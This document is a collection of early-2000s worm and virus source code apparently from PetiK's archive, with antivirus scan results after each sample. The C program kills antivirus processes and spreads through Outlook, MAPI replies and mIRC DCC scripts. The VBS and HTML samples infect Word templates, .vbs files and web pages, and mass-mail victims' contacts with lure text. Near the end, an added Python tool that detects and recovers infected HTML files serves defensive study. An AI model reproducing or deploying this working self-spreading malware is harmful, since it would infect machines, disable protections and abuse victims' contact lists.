mirc("C:\\progra~1\\mirc\\script.ini");
mirc("C:\\progra~1\\mirc32\\script.ini");
break;
case IDM_STOPAV:
StopAV("AVP32.EXE"); // AVP
StopAV("AVPCC.EXE"); // AVP
StopAV("AVPM.EXE"); // AVP
StopAV("WFINDV32.EXE"); // Dr. Solomon
StopAV("F-AGNT95.EXE"); // F-Secure
StopAV("NAVAPW32.EXE"); // Norton Antivirus
StopAV("NAVW32.EXE"); // Norton Antivirus
StopAV("NMAIN.EXE"); // Norton Antivirus
StopAV("PAVSCHED.EXE"); // Panda AntiVirus
StopAV("ZONEALARM.EXE"); // ZoneAlarm
break;
case IDM_STARTUP:
strcpy(start,startup);
strcat(start,"\\Shell32.exe");
CopyFile(filename,"C:\\hello.exe",0);
break;
case IDM_VBSSPREAD:
vbsworm=fopen("C:\\selfworm.vbs","w");
fprintf(vbsworm,"On Error Resume Next\n");
fprintf(vbsworm,"Set sys=sf.GetSpecialFolder(1)\n");
fprintf(vbsworm,"Set OA=CreateObject(%cOutlook.Application%c)\n",34,34);
fprintf(vbsworm,"Set MA=OA.GetNameSpace(%cMAPI%c)\n",34,34);
fprintf(vbsworm,"For Each C In MA.AddressLists\n");
fprintf(vbsworm,"If C.AddressEntries.Count <> 0 Then\n");
fprintf(vbsworm,"For D=1 To C.AddressEntries.Count\n");
fprintf(vbsworm,"Set AD=C.AddressEntries(D)\n");
fprintf(vbsworm,"Set EM=OA.CreateItem(0)\n");
fprintf(vbsworm,"EM.To=AD.Address\n");
fprintf(vbsworm,"EM.Subject=%cHi %c&AD.Name&%c look at this.%c\n",34,34,34,34);
fprintf(vbsworm,"body=%cI found this on the web.%c\n",34,34);
fprintf(vbsworm,"body = body & VbCrLf & %cOpen this funny tool.%c\n",34,34);
fprintf(vbsworm,"EM.Body=body\n");
fprintf(vbsworm,"EM.Attachments.Add(%c%s%c)\n",34,cpywrm,34);
fprintf(vbsworm,"EM.DeleteAfterSubmit=True\n");
fprintf(vbsworm,"If EM.To <> %c%c Then\n",34,34);
fprintf(vbsworm,"EM.Send\n");
fprintf(vbsworm,"End If\n");
fprintf(vbsworm,"Next\n");
fprintf(vbsworm,"End If\n");
fprintf(vbsworm,"Next\n");
fclose(vbsworm);
ShellExecute(NULL,"open","C:\\selfworm.vbs",NULL,NULL,SW_SHOWNORMAL);
Sleep(3000);
DeleteFile("C:\\selfworm.vbs");
break;
case IDM_READMAIL:
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);

if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|
MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
strcpy(mname,mes->lpOriginator->lpszName);
strcpy(maddr,mes->lpOriginator->lpszAddress);
mes->ulReserved=0;
mes->lpszSubject="Re: NEW MAIL.";
mes->lpszNoteText="Here you have a new mail with a funny tool. No danger.\n"
" See you soon.";
mes->lpszMessageType=NULL;
mes->lpszDateReceived=NULL;
mes->lpszConversationID=NULL;
mes->flFlags=MAPI_SENT;
mes->lpOriginator->ulReserved=0;
mes->lpOriginator->ulRecipClass=MAPI_ORIG;
mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
mes->nRecipCount=1;
mes->lpRecips->ulReserved=0;
mes->lpRecips->ulRecipClass=MAPI_TO;
mes->lpRecips->lpszName=mname;
mes->lpRecips->lpszAddress=maddr;
mes->nFileCount=1;
mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
mes->lpFiles->ulReserved=0;
mes->lpFiles->flFlags=NULL;
mes->lpFiles->nPosition=-1;
mes->lpFiles->lpszPathName=filename;
mes->lpFiles->lpszFileName="funny_tool.exe";
mes->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mes, NULL, NULL);
}
}
while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mes->lpFiles);
mFreeBuffer(mes);
mLogoff(session,0,0,0);
}
break;
case IDM_EXIT :
FreeLibrary(hMAPI);
DestroyWindow(hWnd);
break;
}
break;
case WM_DESTROY :
PostQuitMessage(0);
break;
default:
return (DefWindowProc(hWnd, uMsg, wParam, lParam));
}
return(0L);
}

void mirc(char *dir)
{
FILE *script;
script=fopen("C:\\script.ini","w");
fprintf(script,"[script]\n");
fprintf(script,"n0=on 1:JOIN:#:{\n");
fprintf(script,"n1= /if ( $nick == $me ) { halt }\n");
fprintf(script,"n2= /.dcc send $nick %s\n",cpywrm);
fprintf(script,"n3=}\n");
fclose(script);
CopyFile("C:\\script.ini",dir,0);
DeleteFile("C:\\script.ini");
}

void StopAV(char *antivirus)
{
register BOOL term;
lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
uProcess.dwSize=sizeof(uProcess);
rProcessFound=Process32First(lSnapshot,&uProcess);
while(rProcessFound) {
if(strstr(uProcess.szExeFile,antivirus)!=NULL) { // Norton Antivirus
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
if(myproc!=NULL) {
term=TerminateProcess(myproc,0);
}
CloseHandle(myproc);
}
rProcessFound=Process32Next(lSnapshot,&uProcess);
}
CloseHandle(lSnapshot);
}
File SelfWorm.exe received on 05.16.2009 19:29:16 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Trojan.Win32.SystemHijack!IK
AhnLab-V3 5.0.0.2 2009.05.16 -
AntiVir 7.9.0.168 2009.05.15 TR/Agent.29696.34
Antiy-AVL 2.0.3.1 2009.05.15 Trojan/Win32.heuristic
Authentium 5.1.2.4 2009.05.16 W32/Heuristic-119!Eldorado
Avast 4.8.1335.0 2009.05.15 Win32:Trojan-gen {Other}
AVG 8.5.0.336 2009.05.15 Generic13.ANUQ
BitDefender 7.2 2009.05.16 Generic.Malware.SIMPPk.0E8A8CAE
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 BACKDOOR.Trojan
eSafe 7.0.17.0 2009.05.14 Win32.HEURMalware
eTrust-Vet 31.6.6508 2009.05.16 -
F-Prot 4.4.4.56 2009.05.16 W32/Heuristic-119!Eldorado
F-Secure 8.0.14470.0 2009.05.15 -
Fortinet 3.117.0.0 2009.05.16 PossibleThreat
GData 19 2009.05.16 Generic.Malware.SIMPPk.0E8A8CAE
Ikarus T3.1.1.49.0 2009.05.16 Trojan.Win32.SystemHijack
K7AntiVirus 7.10.737 2009.05.16 Trojan.Win32.Malware.1
Kaspersky 7.0.0.125 2009.05.16 Heur.Trojan.Generic
McAfee 5616 2009.05.15 Generic.dx!cf
McAfee+Artemis 5616 2009.05.15 Generic.dx!cf
McAfee-GW-Edition 6.7.6 2009.05.15 Trojan.Agent.29696.34
Microsoft 1.4602 2009.05.16 Trojan:Win32/SystemHijack.gen
NOD32 4080 2009.05.15 probably unknown NewHeur_PE
Norman 6.01.05 2009.05.16 -
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 Trj/CI.A
PCTools 4.4.2.0 2009.05.16 VBS.LoveLetter
Prevx 3.0 2009.05.16 Medium Risk Malware
Trojan.Spy.Win32.Undef.GEN
Rising 21.29.52.00 2009.05.16 [Suspicious]
Sophos 4.41.0 2009.05.16 Mal/Generic-A
Sunbelt 3.2.1858.2 2009.05.16 Heur.Trojan.Generic
Symantec 1.4.4.12 2009.05.16 -
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 PAK_Generic.001
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 VBS.LoveLetter

Additional information
File size: 29696 bytes
MD5...: e1a99c8d213bd20c976cabc1afb709f3
SHA1..: f886237a582c9bb29b30bb00e87dda8a067150f7
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
' Name : VBS.Xchange.A
' Author : PetiK
' Language : VBS
' Date : 27/04/2002

On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
Set fl=fso.OpenTextFile(WScript.ScriptFullname,1)
virus=fl.ReadAll
fl.Close

Set win=fso.GetSpecialFolder(0)
fcopy=win&"\MSXchange.vbs"
reg="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
fso.GetFile(WScript.ScriptFullName).Copy(fcopy)
ws.RegWrite reg&"\MsExchange",fcopy

set sp=fso.CreateTextFile("C:\XChange.vba",True,8)
sp.WriteLine "Attribute VB_Name = ""Xchange"""
sp.WriteLine "Sub AutoOpen()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "e = """""

For i=1 To len(virus)

e=Mid(virus,i,1)
e=Hex(Asc(e))

If Len(e)=1 Then
e="0"&e
End If

f=f+e
If Len(f)=110 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If

If Len(virus)-i = 0 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If

Next

sp.WriteLine "read=dec(e)"
sp.WriteLine "Open ""C:\xchange.vbs"" For Output As #1"
sp.WriteLine "Print #1, read"
sp.WriteLine "Close #1"
sp.WriteLine "Shell ""wscript C:\xchange.vbs"""
sp.WriteLine "Call infect_fichier"
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Sub HelpAbout()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "MsgBox ""This is my very first VBS-W97M Worm"", vbInformation, ""I-Worm.Xchange"""
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Sub AutoClose()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "FileSystem.Kill ""C:\xchange.vbs"""
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Sub infect_fichier()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "Set nor = NormalTemplate.VBProject.VBComponents"
sp.WriteLine "Set doc = ActiveDocument.VBProject.VBComponents"
sp.WriteLine "df = ""C:\XChange.vba"""
sp.WriteLine "If nor.Item(""Xchange"").Name <> ""Xchange"" Then"
sp.WriteLine " doc(""Xchange"").Export df"
sp.WriteLine " nor.Import df"
sp.WriteLine "End If"
sp.WriteLine "If doc.Item(""Xchange"").Name <> ""Xchange"" Then"
sp.WriteLine " nor(""Xchange"").Export df"
sp.WriteLine " doc.Import df"
sp.WriteLine " ActiveDocument.Save"
sp.WriteLine "End If"
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Function dec(octe)"
sp.WriteLine "For hexad = 1 To Len(octe) Step 2"
sp.WriteLine "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))"
sp.WriteLine "Next"
sp.WriteLine "End Function"
sp.Close
infvbs(win)
infvbs(fso.GetSpecialFolder(1))

SendWithOutlook()

Set wd=CreateObject("Word.Application")

If ws.RegRead ("HKLM\Software\Microsoft\MsXchange") <> "Coded by PetiK (c)2002" then
CN = CreateObject("WScript.NetWork").ComputerName
Set srch=wd.Application.FileSearch
srch.Lookin = "C:\": srch.SearchSubFolders = True: srch.FileName="*.doc;*.dot": srch.Execute
Set sp=fso.OpenTextFile(fcopy,8)
sp.WriteLine "'On "&date& " at "&time&" from "&CN
sp.WriteLine "'Number of DOC and DOT file found : "& srch.FoundFiles.Count
sp.WriteBlankLines(1)
sp.Close
ws.RegWrite "HKLM\Software\Microsoft\MsXchange","Coded by PetiK (c)2002"
End If

Set vba=wd.NormalTemplate.VBProject.VBComponents
If vba.Item("Xchange").Name <> "Xchange" Then
vba.Import "C:\XChange.vba"
wd.Application.NormalTemplate.Save
End If
wd.Application.NormalTemplate.Close
wd.Application.Quit

Set mel=fso.CreateTextFile(win&"\kitep.wab.txt",8,TRUE)
counter=0
lect()
mel.WriteLine "#"
mel.Close
WScript.Quit

Sub lect()
On Error Resume Next
Set dr=fso.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
list(d.path&"\")
End If
Next
End Sub
Sub spreadmailto(dir)
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.GetFolder(dir)
Set cf=f.Files
For Each fil in cf
ext=fso.GetExtensionName(fil.path)
ext=lcase(ext)
if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then

set htm=fso.OpenTextFile(fil.path,1)
verif=True
allhtm=htm.ReadAll()
htm.Close
For ml=1 To Len(allhtm)
count=0
If Mid(allhtm,ml,7) = "mailto:" Then
counter=counter+1
mlto=""
Do While Mid(allhtm,ml+6+count,1) <> """"
count=count+1
mlto = mlto + Mid(allhtm,ml+6+count,1)
loop
mel.WriteLine counter &" <"&left(mlto,len(mlto)-1)&">"

sendmailto(left(mlto,len(mlto)-1))

End If

Next

End If
Next
End Sub

Sub list(dir)
On Error Resume Next
Set f=fso.GetFolder(dir)
Set ssf=f.SubFolders
For Each fil in ssf
spreadmailto(fil.path)
list(fil.path)
Next
End Sub

Sub sendmailto(email)
Set out=CreateObject("Outlook.Application")
Set mailmelto=out.CreateItem(0)
mailmelto.To email
mailmelto.Subject "Upgrade Ms Exchange"
mailmelto.Body "Run this attached file to upgrade Ms Exchange"
mailmelto.Attachment.Add (WScript.ScriptFullName)
mailmelto.DeleteAfterSubmit = True
mailmelto.Send
Set out = Nothing
End Sub

Sub SendWithOutlook()
Set A=CreateObject("Outlook.Application")
Set B=A.GetNameSpace("MAPI")
For Each C In B.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.count
Set E=C.AddressEntries(D)
Set F=A.CreateItem(0)
F.To=E.Address
F.Subject="Update and upgrade MS Exchange."
F.Body="run this attached file to update Ms Exchange. See you soon."
Set G=CreateObject("Scripting.FileSystemObject")
F.Attachments.Add(fcopy)
F.DeleteAfterSubmit=True
If F.To <> "" Then
F.Send
End If
Next
End If
Next
End Sub

Function infvbs(Folder)
If f.FolderExists(Folder) then

For each P in f.GetFolder(Folder).Files
ext=f.GetExtensionName(P.Name)
If ext="vbs" or ext="vbe" Then
Set VF=f.OpenTextFile(P.path, 1)
mark=VF.Read(14)
VF.Close
If mark <> "'VBS.Xchange.A" Then
Set VF=f.OpenTextFile(P.path, 1)
VC=VF.ReadAll
VF.Close
VCd=virus & VC
Set VF=f.OpenTextFile(P.path,2,True)
VF.Write VCd
VF.Close
End If

End If
Next

End If
End Function
File Xchange_A.vbs received on 05.16.2009 20:03:44 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Email-Worm.VBS.Xchange.A!IK
AhnLab-V3 5.0.0.2 2009.05.16 VBS/Chu
AntiVir 7.9.0.168 2009.05.15 Worm/Chu.1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/VBS.VBS
Authentium 5.1.2.4 2009.05.16 VBS/Chu.A@mm
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.72BAC97E
CAT-QuickHeal 10.00 2009.05.15 VBS/Chu.A
ClamAV 0.94.1 2009.05.16 Worm.Chu.1
Comodo 1157 2009.05.08 Email-Worm.VBS.Chu.a
DrWeb 5.0.0.12182 2009.05.16 VBS.Generic.15
eSafe 7.0.17.0 2009.05.14 VBS.FireBurn.
eTrust-Vet 31.6.6508 2009.05.16 VBS/VBSWG!generic
F-Prot 4.4.4.56 2009.05.16 VBS/Chu.A@mm
F-Secure 8.0.14470.0 2009.05.16 Email-Worm.VBS.Chu.a
Fortinet 3.117.0.0 2009.05.16 VBS/Chu.A@mm
GData 19 2009.05.16 Generic.ScriptWorm.72BAC97E
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.VBS.Xchange.A
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.VBS.Chu.a
McAfee 5616 2009.05.15 VBS/Generic@MM
McAfee+Artemis 5616 2009.05.15 VBS/Generic@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Chu.1
Microsoft 1.4602 2009.05.16 Virus:VBS/Chu
NOD32 4080 2009.05.15 probably unknown SCRIPT
Norman 6.01.05 2009.05.16 VBS/Chu.D
nProtect 2009.1.8.0 2009.05.16 VBS.Chu.B@mm
Panda 10.0.0.14 2009.05.16 VBS/Chu
PCTools 4.4.2.0 2009.05.16 VBS.Petxch.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Script.VBS.Chu
Sophos 4.41.0 2009.05.16 VBS/Xchange-A
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_CHU.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.VBS.Chu.a
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 VBS.Petxch.A

Additional information
File size: 5770 bytes
MD5...: de34d735d30bd0e107e14bb6aa8bf3e0
SHA1..: 8d976194e4ae851e0408c53f0db41f9c6f994a46
' Name : VBS.Xchange.B aka RasLFront (because of the French presidential election in 2002)
' Author : PetiK
' Language : VBS
' Date : 05/05/2002

'VBS.Xchange.B aka RasLFront
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
Set fl=fso.OpenTextFile(WScript.ScriptFullname,1)
virus=fl.ReadAll
fl.Close

Set win=fso.GetSpecialFolder(0)
fcopy=win&"\XchgFix.vbs"
reg="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
'fso.GetFile(WScript.ScriptFullName).Copy(fcopy)
'ws.RegWrite reg&"\MsExchangeFix",fcopy
set sp=fso.CreateTextFile("C:\rlf.sys",True,8)
sp.WriteLine "Private Sub Document_Open()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "e = """""

For i=1 To len(virus)

e=Mid(virus,i,1)
e=Hex(Asc(e))

If Len(e)=1 Then
e="0"&e
End If

f=f+e
If Len(f)=110 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If

If Len(virus)-i = 0 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If

Next

sp.WriteLine "Call infect_fichier"
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Sub HelpAbout()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "MsgBox ""This is my very first VBS-W97M Worm"", vbInformation, ""I-Worm.Xchange"""
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Sub AutoClose()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "FileSystem.Kill ""C:\xfix.vbs"""
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Sub infect_fichier()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "Set nor = NormalTemplate.VBProject.VBComponents(1)"
sp.WriteLine "Set doc = ActiveDocument.VBProject.VBComponents(1)"
sp.WriteLine "df = ""C:\rlf.sys"""
sp.WriteLine "If nor.Name <> ""raslfront"" Then"
sp.WriteLine "nor.Name = ""raslfront"""
sp.WriteLine "read=dec(e)"
sp.WriteLine "Open ""C:\xfix.vbs"" For Output As #1"
sp.WriteLine "Print #1, read"
sp.WriteLine "Close #1"
sp.WriteLine "Shell ""wscript C:\xfix.vbs"""
sp.WriteLine "End If"
sp.WriteLine ""
sp.WriteLine "Function dec(octe)"
sp.WriteLine "For hexad = 1 To Len(octe) Step 2"
sp.WriteLine "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))"
sp.WriteLine "Next"
sp.WriteLine "End Function"
sp.Close

Set wrd=CreateObject("Word.Application")
wrd.Options.virusprotection=0
wrd.Options.savenormalprompt=0
wrd.Options.confirmconversion=0
If wrd.normaltemplate.vbproject.vbcomponents(1).name <> "raslfront" Then
wrd.normaltemplate.vbproject.vbcomponents(1).codemodule.addfromFile("C:\rlf.sys")
wrd.normaltemplate.vbproject.vbcomponents(1).name="raslfront"
MsgBox "Pas Encore"
End If
wrd.Application.Quit
WScript.Quit
<welcome>
<html><head><title>Welcome</title>
<body onLoad="window.status='Welcome to my last creation'">

<SCRIPT Language=VBScript>
On Error Resume Next
msgbox "Please accept the ActiveX",vbinformation,"MSIE Warning !"
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
If err.number=429 then
ws.Run javascript:location.reload()
Else

vbsn=""
For vbsname=1 To 8
randomize(timer)
vbsn=vbsn & chr(int(rnd(1)*26)+65)
Next
vbsn=vbsn&".vbs"

htms=document.body.createTextRange.htmltext
Set vbsf=fso.CreateTextFile("C:\"&vbsn,2,True)
vbsf.WriteLine "Set fs=CreateObject(""Scripting.FileSystemObject"")"
vbsf.WriteLine "Set ws=CreateObject(""WScript.Shell"")"
vbsf.Write "htm="""

For i=1 To Len(htms)
e=Mid(htms,i,1)
e=Hex(Asc(e))
If Len(e)=1 Then
e="0"&e
End If
vbsf.Write e
Next

vbsf.Write """"
vbsf.WriteLine ""
vbsf.WriteLine "Set newhtm=fs.CreateTextFile(""C:\Welcome2U.htm"",True,2)"
vbsf.WriteLine "newhtm.WriteLine ""<welcome>"""
vbsf.WriteLine "newhtm.WriteLine ""<html><head><title>Welcome</title>"""
vbsf.WriteLine "newhtm.WriteLine ""<body onLoad=""""window.status='Welcome to my last creation'"""">"""
vbsf.WriteLine "read="""""
vbsf.WriteLine "For pos=1 To Len(htm) Step 2"
vbsf.WriteLine "read=read " &Chr(38)& " Chr(""" &Chr(38)& "h"""&Chr(38)& " Mid(htm,pos,2))"
vbsf.WriteLine "Next"
vbsf.WriteLine "newhtm.Write read"
vbsf.WriteLine "newhtm.WriteLine ""</body></html>"""
vbsf.WriteLine "newhtm.Close"
vbsf.WriteLine "ws.Run ""C:\Welcome2U.htm"""
vbsf.Close

Set win=fso.GetSpecialFolder(0)
Set sys=fso.GetSpecialFolder(1)

Set out=CreateObject("Outlook.Application")
Set map=out.GetNameSpace("MAPI")
For Each adr In map.AddressLists
If adr.AddressEntries <> 0 Then
For addr=1 To adr.Addressentries.Count
Set nadr=adr.AddressEntries(addr)
Set mel=out.CreateItem(0)
mel.To=nadr.Address
mel.Subject="A Gift from your best friend"
mel.Body="This is for you (" &left(vbsn,8)& ")."
mel.Attachments.Add("C:\"&vbsn)
mel.Send
Next
End If
Next

infect(win)
infect(sys)
infect(fso.GetSpecialFolder(1))
infect(ws.SpecialFolders("MyDocuments"))
infect(ws.SpecialFolders("Desktop"))
infect(ws.SpecialFolders("Favorites"))
infect(ws.SpecialFolders("Recent"))

If Day(Now())=7 Then
document.write "<font face='Lucida Console' size='2' color=black>Welcome to my last creation : HTML.Welcome.A<br>Coded by PetiK/[rRlf]<br></font>"
Else
document.write "<font face='Lucida Console' size='3' color=black>Welcome To You !<br>Have a nice day.<br></font>"
End If
End If

Function infect(doss)
Set FolderObj = FSO.GetFolder(doss)
Set FO = FolderObj.Files
For each cible in FO
ext = lcase(FSO.GetExtensionName(cible.Name))
if ext="htm" or ext="html" or ext="htz" or ext="hta" or ext="asp" Then
Set good = fso.OpenTextFile(cible.path, 1, False)
if good.readline <> "<welcome>" Then
good.close()
Set good = fso.OpenTextFile(cible.path, 1, False)
htmorg = good.ReadAll()
good.close()
Set virus = document.body.createTextRange
Set good = fso.CreateTextFile(cible.path, True, False)
good.WriteLine "<welcome>"
good.Write(htmorg)
good.WriteLine virus.htmltext
good.Close()
else
good.close()
end if
end if
next
End Function
</script>
</body></html>

YVQAVQXD.vbs

Set fs=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
htm="0D0A3C534352495054206C61...6E67756167543E"
Set newhtm=fs.CreateTextFile("C:\Welcome2U.htm",True,2)
newhtm.WriteLine "<welcome>"
newhtm.WriteLine "<html><head><title>Welcome</title>"
newhtm.WriteLine "<body onLoad=""window.status='Welcome to my last creation'"">"
read=""
For pos=1 To Len(htm) Step 2
read=read & Chr("&h"& Mid(htm,pos,2))
Next
newhtm.Write read
newhtm.WriteLine "</body></html>"
newhtm.Close
ws.Run "C:\Welcome2U.htm"
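Added example, not code from PetiK's archive: a small Python responder's tool for the two mechanisms shown above. It mirrors the dropper's hex-to-text loop (Chr("&h" & Mid(htm,pos,2)) over pairs of digits), detects hosts infected by the infect() routine through the "<welcome>" marker it writes on line 1, and attempts to recover the original host. The recovery rule (the original ends at the first </html> after the marker, because the virus appends its own HTML after the host) is an assumption of this example, not something the virus documents; the sample infected file is constructed here, and only the first 24 hex digits visible in the truncated dropper string are decoded.

```python
"""Added example (not part of PetiK's archive): decode the hex-packed
payload used by the YVQAVQXD.vbs dropper and detect / recover hosts
infected by HTML.Welcome.A, which prepends the marker line "<welcome>"
and appends its own script after the original document."""
import re
from pathlib import Path

WELCOME_MARKER = b"<welcome>"
# Extensions the infect() routine targets (it lower-cases them first).
TARGET_EXTS = {"htm", "html", "htz", "hta", "asp"}


def decode_hex_payload(hex_text: str) -> str:
    """Equivalent of the dropper's loop:
    For pos=1 To Len(htm) Step 2: read=read & Chr("&h" & Mid(htm,pos,2)).
    Chr() yields one byte per pair, so decode as Latin-1."""
    compact = re.sub(r"\s+", "", hex_text)
    if len(compact) % 2:  # VBS would swallow a lone trailing nibble; reject instead
        raise ValueError("odd-length hex string")
    return bytes.fromhex(compact).decode("latin-1")


def is_welcome_infected(data: bytes) -> bool:
    """The virus skips a host whose first line already reads "<welcome>";
    the same check identifies an infected file."""
    first_line = data.split(b"\n", 1)[0].rstrip(b"\r")
    return first_line == WELCOME_MARKER


def recover_host(data: bytes):
    """Best-effort recovery (assumption of this example): the infected file is
    marker + original + appended virus HTML, so the original ends at the first
    </html> after the marker. Returns None if not infected or no </html>."""
    if not is_welcome_infected(data):
        return None
    body = data.split(b"\n", 1)[1] if b"\n" in data else b""
    m = re.search(rb"</html>", body, re.IGNORECASE)
    if m is None:
        return None
    return body[: m.end()]


def scan_dir(root) -> list:
    """Walk a directory tree and list infected host files by path."""
    hits = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lstrip(".").lower() in TARGET_EXTS:
            if is_welcome_infected(path.read_bytes()):
                hits.append(str(path))
    return hits


# Constructed sample: a clean host and what infect() would turn it into
# (WriteLine "<welcome>", Write original, WriteLine virus html).
CLEAN_HOST = b"<html><body>Hello</body></html>"
INFECTED_HOST = (WELCOME_MARKER + b"\r\n" + CLEAN_HOST
                 + b"\r\n<SCRIPT language=vbscript>' worm body here</SCRIPT>\r\n")

if __name__ == "__main__":
    # The first 24 hex digits visible in the dropper decode to "\r\n<SCRIPT la".
    print(repr(decode_hex_payload("0D0A3C534352495054206C61")))
    print(is_welcome_infected(INFECTED_HOST), recover_host(INFECTED_HOST) == CLEAN_HOST)
```

Run scan_dir() over a user's Documents, Desktop and Favorites folders (the folders the virus iterates) to enumerate hosts; keep the infected originals for signature work before writing recovered copies back.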
File Welcome.htm received on 05.16.2009 19:58:08 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Virus.VBS.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 HTML/Htz
AntiVir 7.9.0.168 2009.05.15 VBS/Petik.1
Antiy-AVL 2.0.3.1 2009.05.15 Virus/VBS.VBS
Authentium 5.1.2.4 2009.05.16 VBS/Chu.C@mm
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 VBS/Nuel
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.7F8BE6E9
CAT-QuickHeal 10.00 2009.05.15 VBS/Chu.C
ClamAV 0.94.1 2009.05.16 Worm.VBS.Petik
Comodo 1157 2009.05.08 Unclassified Malware
DrWeb 5.0.0.12182 2009.05.16 VBS.Generic.16
eSafe 7.0.17.0 2009.05.14 VBS.TVKid.
eTrust-Vet 31.6.6508 2009.05.16 VBS/Nuel.B
F-Prot 4.4.4.56 2009.05.16 VBS/Chu.C@mm
F-Secure 8.0.14470.0 2009.05.15 Virus.VBS.Petik
Fortinet 3.117.0.0 2009.05.16 VBS/Htz@mm
GData 19 2009.05.16 Generic.ScriptWorm.7F8BE6E9
Ikarus T3.1.1.49.0 2009.05.16 Virus.VBS.Petik
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Virus.VBS.Petik
McAfee 5616 2009.05.15 VBS/Nuel@MM
McAfee+Artemis 5616 2009.05.15 VBS/Nuel@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Petik.1
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.gen
NOD32 4080 2009.05.15 probably unknown SCRIPT
Norman 6.01.05 2009.05.16 VBS/Petik.P
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.J@mm
Panda 10.0.0.14 2009.05.16 VBS/Petik.L
PCTools 4.4.2.0 2009.05.16 VBS.Acroph.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Script.VBS.Petik
Sophos 4.41.0 2009.05.16 VBS/Petik-W
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Manu@mm
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.G
VBA32 3.12.10.5 2009.05.16 Virus.VBS.Petik
ViRobot 2009.5.15.1737 2009.05.15 VBS.Worm-Family
VirusBuster 4.6.5.0 2009.05.16 VBS.Acroph.A

Additional information
File size: 3349 bytes
